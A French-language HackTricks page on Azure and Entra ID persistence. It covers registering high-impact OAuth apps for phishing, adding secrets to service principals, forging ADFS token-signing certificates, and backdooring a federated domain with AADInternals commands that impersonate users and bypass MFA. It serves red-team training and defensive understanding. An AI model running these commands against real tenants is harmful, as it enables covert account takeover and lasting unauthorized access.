Az - Persistence

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks

OAuth Application

Par dĂ©faut, tout utilisateur peut enregistrer une application dans Entra ID. Vous pouvez donc enregistrer une application (uniquement pour le locataire cible) qui nĂ©cessite des autorisations Ă  fort impact avec le consentement de l’administrateur (et l’approuver si vous ĂȘtes l’administrateur) - comme envoyer des mails au nom d’un utilisateur, la gestion des rĂŽles, etc. Cela nous permettra d’exĂ©cuter des attaques de phishing qui seraient trĂšs fructueuses en cas de succĂšs.

De plus, vous pourriez Ă©galement accepter cette application avec votre utilisateur comme moyen de maintenir l’accĂšs.

Applications et Principaux de Service

Avec les privilĂšges d’Administrateur d’Application, GA ou un rĂŽle personnalisĂ© avec des permissions microsoft.directory/applications/credentials/update, nous pouvons ajouter des identifiants (secret ou certificat) Ă  une application existante.

Il est possible de cibler une application avec des autorisations Ă©levĂ©es ou d’ajouter une nouvelle application avec des autorisations Ă©levĂ©es.

Un rĂŽle intĂ©ressant Ă  ajouter Ă  l’application serait le rĂŽle d’administrateur d’authentification privilĂ©giĂ©e car il permet de rĂ©initialiser le mot de passe des Administrateurs Globaux.

Cette technique permet Ă©galement de contourner la MFA.

$passwd = ConvertTo-SecureString "J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("311bf843-cc8b-459c-be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $credentials -Tenant e12984235-1035-452e-bd32-ab4d72639a
  • Pour l’authentification basĂ©e sur des certificats
Connect-AzAccount -ServicePrincipal -Tenant <TenantId> -CertificateThumbprint <Thumbprint> -ApplicationId <ApplicationId>

Federation - Certificat de signature de jeton

Avec des privileges DA sur AD local, il est possible de crĂ©er et d’importer de nouveaux certificats de signature de jeton et de dĂ©cryptage de jeton qui ont une trĂšs longue validitĂ©. Cela nous permettra de nous connecter en tant que n’importe quel utilisateur dont nous connaissons l’ImmutableID.

ExĂ©cutez la commande ci-dessous en tant que DA sur le(s) serveur(s) ADFS pour crĂ©er de nouveaux certificats (mot de passe par dĂ©faut ‘AADInternals’), les ajouter Ă  ADFS, dĂ©sactiver le renouvellement automatique et redĂ©marrer le service :

New-AADIntADFSSelfSignedCertificates

Ensuite, mettez Ă  jour les informations du certificat avec Azure AD :

Update-AADIntADFSFederationSettings -Domain cyberranges.io

Fédération - Domaine de confiance

Avec des privilĂšges GA sur un locataire, il est possible d’ajouter un nouveau domaine (doit ĂȘtre vĂ©rifiĂ©), de configurer son type d’authentification en tant que FĂ©dĂ©rĂ© et de configurer le domaine pour faire confiance Ă  un certificat spĂ©cifique (any.sts dans la commande ci-dessous) et Ă  l’émetteur :

# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io

# Get ImmutableID of the user that we want to impersonate. Using Msol module
Get-MsolUser | select userPrincipalName,ImmutableID

# Access any cloud app as the user
Open-AADIntOffice365Portal -ImmutableID qIMPTm2Q3kimHgg4KQyveA== -Issuer "http://any.sts/B231A11F" -UseBuiltInCertificate -ByPassMFA$true

Références

Tip

Apprenez & pratiquez AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Apprenez & pratiquez GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Apprenez & pratiquez Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Soutenez HackTricks